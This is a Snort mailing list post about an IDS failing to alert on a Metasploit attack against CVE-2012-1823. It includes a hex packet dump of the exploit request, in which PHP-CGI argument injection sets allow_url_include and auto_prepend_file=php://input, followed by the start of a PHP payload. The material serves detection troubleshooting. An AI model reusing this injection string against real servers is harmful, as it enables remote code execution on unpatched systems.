Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Metasploit - CVE-2012-1823 - Snort Sleeping

From: "lists () packetmail net" <lists () packetmail net>
Date: Fri, 26 Apr 2013 16:01:07 -0500
On 04/26/2013 03:56 PM, MA Bel wrote:

Got a pcap?


Again, need to see your Snort.conf; what's $HOME_NET, what's $EXTERNAL_NET,
what's http_inspect and stream5 look like?


18:26:21.787981 IP 192.168.238.111.51274 > 192.168.238.222.80: Flags [P.], seq
1:2039, ack 1, win 913, options [nop,nop,TS val 8260740 ecr 1348643], length 2038
        0x0000:  4500 082a 7310 4000 4006 611e c0a8 ee6f  E..*s.@.@.a....o
        0x0010:  c0a8 eede c84a 0050 be52 7f8b dc23 2563  .....J.P.R...#%c
        0x0020:  8018 0391 66bc 0000 0101 080a 007e 0c84  ....f........~..
        0x0030:  0014 9423 504f 5354 202f 3f2d 2d64 6566  ...#POST./?--def
        0x0040:  696e 652b 616c 6c6f 775f 7572 6c5f 696e  ine+allow_url_in
        0x0050:  636c 7564 6525 3364 7452 5565 2b2d 2d64  clude%3dtRUe+--d
        0x0060:  6566 696e 652b 7361 6665 5f6d 6f64 6525  efine+safe_mode%
        0x0070:  3364 4f66 662b 2d25 3634 2b73 7568 6f73  3dOff+-%64+suhos
        0x0080:  696e 2e73 696d 756c 6174 696f 6e25 3364  in.simulation%3d
        0x0090:  4f4e 2b2d 2536 342b 6469 7361 626c 655f  ON+-%64+disable_
        0x00a0:  6675 6e63 7469 6f6e 7325 3364 2532 3225  functions%3d%22%
        0x00b0:  3232 2b2d 2536 342b 6f70 656e 5f62 6173  22+-%64+open_bas
        0x00c0:  6564 6972 2533 646e 6f6e 652b 2d25 3634  edir%3dnone+-%64
        0x00d0:  2b61 7574 6f5f 7072 6570 656e 645f 6669  +auto_prepend_fi
        0x00e0:  6c65 2533 6470 6870 3a2f 2f69 6e70 7574  le%3dphp://input
        0x00f0:  2b2d 2d6e 6f2d 7068 702d 696e 692b 2b20  +--no-php-ini++.
        0x0100:  4854 5450 2f31 2e31 0d0a 486f 7374 3a20  HTTP/1.1..Host:.
        0x0110:  3139 322e 3136 382e 3233 382e 3232 320d  192.168.238.222.
        0x0120:  0a55 7365 722d 4167 656e 743a 204d 6f7a  .User-Agent:.Moz
        0x0130:  696c 6c61 2f34 2e30 2028 636f 6d70 6174  illa/4.0.(compat
        0x0140:  6962 6c65 3b20 4d53 4945 2036 2e30 3b20  ible;.MSIE.6.0;.
        0x0150:  5769 6e64 6f77 7320 4e54 2035 2e31 290d  Windows.NT.5.1).
        0x0160:  0a43 6f6e 7465 6e74 2d54 7970 653a 2061  .Content-Type:.a
        0x0170:  7070 6c69 6361 7469 6f6e 2f78 2d77 7777  pplication/x-www
        0x0180:  2d66 6f72 6d2d 7572 6c65 6e63 6f64 6564  -form-urlencoded
        0x0190:  0d0a 436f 6e74 656e 742d 4c65 6e67 7468  ..Content-Length
        0x01a0:  3a20 3136 3634 0d0a 0d0a 3c3f 7068 7020  :.1664....<?php.
        0x01b0:  0909 0940 7365 745f 7469 6d65 5f6c 696d  ...@set_time_lim
        0x01c0:  6974 2830 293b 2040 6967 6e6f 7265 5f75  it(0);.@ignore_u

------------------------------------------------------------------------------
Try New Relic Now & We'll Send You this Cool Shirt
New Relic is the only SaaS-based application performance monitoring service 
that delivers powerful full stack analytics. Optimize and monitor your
browser, app, & servers with just a few lines of code. Try New Relic
and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_apr
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
Previous By Date Next
Previous By Thread Next

Current thread: